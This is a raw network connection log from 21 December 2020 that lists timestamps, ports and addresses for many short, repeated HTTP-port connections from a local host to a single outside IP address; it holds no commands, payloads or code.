Dec 21, 2020 08:33:51.917661905 CET	49208	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:51.976864100 CET	80	49208	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:52.139856100 CET	49209	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:52.197175026 CET	80	49209	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:52.197315931 CET	49209	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:52.201844931 CET	49209	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:52.258910894 CET	80	49209	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:52.258999109 CET	49209	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:52.315937996 CET	80	49209	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:52.382858992 CET	80	49209	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:52.383037090 CET	49209	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:52.383069038 CET	49209	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:52.440119028 CET	80	49209	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:52.610146999 CET	49210	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:52.675530910 CET	80	49210	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:52.675726891 CET	49210	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:52.681830883 CET	49210	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:52.747118950 CET	80	49210	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:52.747304916 CET	49210	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:52.812685966 CET	80	49210	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:52.881215096 CET	80	49210	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:52.881311893 CET	49210	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:52.881370068 CET	49210	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:52.946640968 CET	80	49210	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:53.091353893 CET	49211	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:53.150063038 CET	80	49211	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:53.150312901 CET	49211	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:53.154706001 CET	49211	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:53.213680029 CET	80	49211	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:53.213798046 CET	49211	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:53.272543907 CET	80	49211	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:53.346194029 CET	80	49211	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:53.346297026 CET	49211	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:53.346359015 CET	49211	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:53.405051947 CET	80	49211	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:53.548289061 CET	49212	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:53.613183975 CET	80	49212	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:53.613331079 CET	49212	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:53.619537115 CET	49212	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:53.684393883 CET	80	49212	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:53.684495926 CET	49212	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:53.749001026 CET	80	49212	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:53.817548990 CET	80	49212	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:53.817704916 CET	49212	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:53.817749023 CET	49212	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:53.882531881 CET	80	49212	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:54.030911922 CET	49213	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:54.089802027 CET	80	49213	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:54.089929104 CET	49213	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:54.095933914 CET	49213	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:54.154711008 CET	80	49213	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:54.154880047 CET	49213	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:54.213489056 CET	80	49213	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:54.282756090 CET	80	49213	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:54.282849073 CET	49213	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:54.282879114 CET	49213	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:54.341600895 CET	80	49213	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:54.498424053 CET	49214	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:54.559046984 CET	80	49214	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:54.559159040 CET	49214	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:54.563018084 CET	49214	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:54.623600006 CET	80	49214	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:54.623703957 CET	49214	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:54.684370041 CET	80	49214	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:54.753853083 CET	80	49214	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:54.753953934 CET	49214	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:54.754021883 CET	49214	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:54.814559937 CET	80	49214	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:54.952672005 CET	49215	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:55.012064934 CET	80	49215	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:55.012300968 CET	49215	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:55.018162966 CET	49215	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:55.077548027 CET	80	49215	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:55.077656984 CET	49215	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:55.136941910 CET	80	49215	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:55.203334093 CET	80	49215	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:55.203444004 CET	49215	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:55.203519106 CET	49215	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:55.263056993 CET	80	49215	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:55.399091959 CET	49216	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:55.464103937 CET	80	49216	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:55.464199066 CET	49216	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:55.468060017 CET	49216	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:55.533442974 CET	80	49216	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:55.533708096 CET	49216	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:55.598577023 CET	80	49216	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:57.629524946 CET	80	49216	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:57.629859924 CET	49216	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:57.629909992 CET	49216	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:57.695012093 CET	80	49216	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:58.140981913 CET	49217	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:58.203758001 CET	80	49217	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:58.203864098 CET	49217	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:58.210022926 CET	49217	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:58.273148060 CET	80	49217	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:58.273217916 CET	49217	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:58.336021900 CET	80	49217	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:58.403531075 CET	80	49217	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:58.403745890 CET	49217	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:58.403810024 CET	49217	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:58.466769934 CET	80	49217	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:58.603384018 CET	49218	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:58.666301966 CET	80	49218	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:58.666425943 CET	49218	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:58.669352055 CET	49218	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:58.732618093 CET	80	49218	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:58.732717037 CET	49218	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:58.795488119 CET	80	49218	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:58.864826918 CET	80	49218	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:58.865016937 CET	49218	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:58.865070105 CET	49218	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:58.928010941 CET	80	49218	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:59.077091932 CET	49219	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:59.138428926 CET	80	49219	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:59.138535023 CET	49219	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:59.144565105 CET	49219	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:59.205702066 CET	80	49219	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:59.205810070 CET	49219	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:59.266824961 CET	80	49219	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:59.334280014 CET	80	49219	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:59.334373951 CET	49219	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:59.334424019 CET	49219	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:59.395490885 CET	80	49219	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:59.539400101 CET	49220	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:59.597840071 CET	80	49220	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:59.598207951 CET	49220	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:59.604248047 CET	49220	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:59.662436962 CET	80	49220	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:59.662579060 CET	49220	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:59.720813036 CET	80	49220	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:59.791795015 CET	80	49220	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:59.791939020 CET	49220	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:59.792001963 CET	49220	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:59.850467920 CET	80	49220	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:00.001544952 CET	49221	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:00.060246944 CET	80	49221	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:00.060425043 CET	49221	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:00.066545963 CET	49221	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:00.125318050 CET	80	49221	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:00.125519991 CET	49221	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:00.184448004 CET	80	49221	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:00.256094933 CET	80	49221	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:00.256268024 CET	49221	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:00.256290913 CET	49221	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:00.314876080 CET	80	49221	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:00.460498095 CET	49222	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:00.518879890 CET	80	49222	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:00.519022942 CET	49222	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:00.524930000 CET	49222	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:00.583134890 CET	80	49222	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:00.583291054 CET	49222	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:00.641360044 CET	80	49222	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:00.710942030 CET	80	49222	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:00.711050987 CET	49222	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:00.711098909 CET	49222	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:00.769320011 CET	80	49222	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:00.930202961 CET	49223	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:00.988284111 CET	80	49223	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:00.988403082 CET	49223	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:00.993901014 CET	49223	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:01.051187992 CET	80	49223	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:01.051279068 CET	49223	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:01.108541012 CET	80	49223	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:01.177423000 CET	80	49223	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:01.177563906 CET	49223	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:01.177597046 CET	49223	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:01.234453917 CET	80	49223	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:01.371500969 CET	49224	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:01.429152012 CET	80	49224	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:01.429274082 CET	49224	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:01.452553988 CET	49224	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:01.510309935 CET	80	49224	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:01.510457039 CET	49224	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:01.567836046 CET	80	49224	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:01.638468981 CET	80	49224	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:01.638583899 CET	49224	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:01.638679028 CET	49224	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:01.696224928 CET	80	49224	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:01.814410925 CET	49225	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:01.872178078 CET	80	49225	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:01.872250080 CET	49225	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:01.876667023 CET	49225	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:01.934242010 CET	80	49225	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:01.934315920 CET	49225	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:01.992284060 CET	80	49225	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:02.059926033 CET	80	49225	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:02.060055017 CET	49225	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:02.061584949 CET	49225	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:02.119381905 CET	80	49225	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:02.236277103 CET	49226	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:02.299185038 CET	80	49226	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:02.300611019 CET	49226	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:02.621823072 CET	49226	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:02.684820890 CET	80	49226	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:02.686640024 CET	49226	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:02.749521017 CET	80	49226	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:02.813173056 CET	80	49226	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:02.813741922 CET	49226	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:02.814066887 CET	49226	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:02.876923084 CET	80	49226	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:03.048140049 CET	49227	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:03.107093096 CET	80	49227	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:03.110707045 CET	49227	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:03.371543884 CET	49227	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:03.430550098 CET	80	49227	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:03.430640936 CET	49227	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:03.489361048 CET	80	49227	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:03.553005934 CET	80	49227	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:03.553134918 CET	49227	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:03.576020956 CET	49227	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:03.635046959 CET	80	49227	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:03.765573025 CET	49228	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:03.831459045 CET	80	49228	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:03.831568003 CET	49228	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:03.833935022 CET	49228	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:03.899071932 CET	80	49228	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:03.899218082 CET	49228	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:03.964351892 CET	80	49228	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:04.038429976 CET	80	49228	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:04.038768053 CET	49228	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:04.038820028 CET	49228	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:04.103775024 CET	80	49228	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:04.228832006 CET	49229	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:04.288120031 CET	80	49229	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:04.288213968 CET	49229	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:04.292102098 CET	49229	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:04.351241112 CET	80	49229	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:04.351355076 CET	49229	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:04.410643101 CET	80	49229	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:04.473880053 CET	80	49229	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:04.474005938 CET	49229	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:04.474080086 CET	49229	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:04.533174992 CET	80	49229	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:04.664752960 CET	49230	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:04.724421978 CET	80	49230	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:04.724572897 CET	49230	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:04.727065086 CET	49230	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:04.786554098 CET	80	49230	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:04.786632061 CET	49230	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:04.843626976 CET	80	49230	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:04.906800032 CET	80	49230	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:04.906966925 CET	49230	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:04.907196999 CET	49230	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:04.964160919 CET	80	49230	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:05.119026899 CET	49231	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:05.177951097 CET	80	49231	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:05.178097963 CET	49231	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:05.184514999 CET	49231	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:05.243412971 CET	80	49231	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:05.243503094 CET	49231	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:05.302042961 CET	80	49231	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:05.370029926 CET	80	49231	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:05.370166063 CET	49231	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:05.370213985 CET	49231	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:05.428744078 CET	80	49231	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:05.565881968 CET	49232	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:05.624756098 CET	80	49232	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:05.624891996 CET	49232	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:05.631099939 CET	49232	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:05.689940929 CET	80	49232	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:05.690062046 CET	49232	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:05.748846054 CET	80	49232	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:05.812973022 CET	80	49232	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:05.813100100 CET	49232	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:05.813152075 CET	49232	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:05.871680021 CET	80	49232	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:06.010188103 CET	49233	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:06.067111969 CET	80	49233	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:06.067265034 CET	49233	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:06.072212934 CET	49233	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:06.128952026 CET	80	49233	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:06.129213095 CET	49233	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:06.186211109 CET	80	49233	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:06.257530928 CET	80	49233	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:06.257637024 CET	49233	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:06.257704020 CET	49233	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:06.314316034 CET	80	49233	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:06.453483105 CET	49234	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:06.512602091 CET	80	49234	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:06.512711048 CET	49234	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:06.518841982 CET	49234	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:06.577845097 CET	80	49234	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:06.577920914 CET	49234	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:06.636863947 CET	80	49234	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:06.707418919 CET	80	49234	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:06.707560062 CET	49234	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:06.707619905 CET	49234	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:06.769081116 CET	80	49234	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:06.902704000 CET	49235	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:06.968205929 CET	80	49235	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:06.968375921 CET	49235	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:06.975399017 CET	49235	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:07.041264057 CET	80	49235	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:07.041409969 CET	49235	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:07.106787920 CET	80	49235	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:07.170943022 CET	80	49235	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:07.171279907 CET	49235	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:07.171330929 CET	49235	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:07.236733913 CET	80	49235	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:07.367867947 CET	49236	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:07.426866055 CET	80	49236	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:07.426978111 CET	49236	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:07.433149099 CET	49236	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:07.492201090 CET	80	49236	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:07.492361069 CET	49236	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:07.551373005 CET	80	49236	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:07.616414070 CET	80	49236	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:07.616523981 CET	49236	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:07.616595030 CET	49236	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:07.675654888 CET	80	49236	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:07.813030005 CET	49237	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:07.876470089 CET	80	49237	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:07.876580954 CET	49237	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:07.882491112 CET	49237	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:07.945997000 CET	80	49237	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:07.946084976 CET	49237	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:08.012375116 CET	80	49237	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:08.079046011 CET	80	49237	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:08.079102039 CET	49237	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:08.079133987 CET	49237	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:08.142515898 CET	80	49237	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:08.263194084 CET	49238	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:08.323256969 CET	80	49238	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:08.323381901 CET	49238	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:08.329480886 CET	49238	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:08.389195919 CET	80	49238	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:08.389296055 CET	49238	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:08.449070930 CET	80	49238	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:08.518978119 CET	80	49238	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:08.519145966 CET	49238	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:08.519175053 CET	49238	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:08.578869104 CET	80	49238	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:08.710504055 CET	49239	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:08.769484997 CET	80	49239	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:08.769588947 CET	49239	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:08.775652885 CET	49239	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:08.834585905 CET	80	49239	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:08.834712982 CET	49239	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:08.893655062 CET	80	49239	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:08.962409019 CET	80	49239	185.193.143.118	192.168.2.22
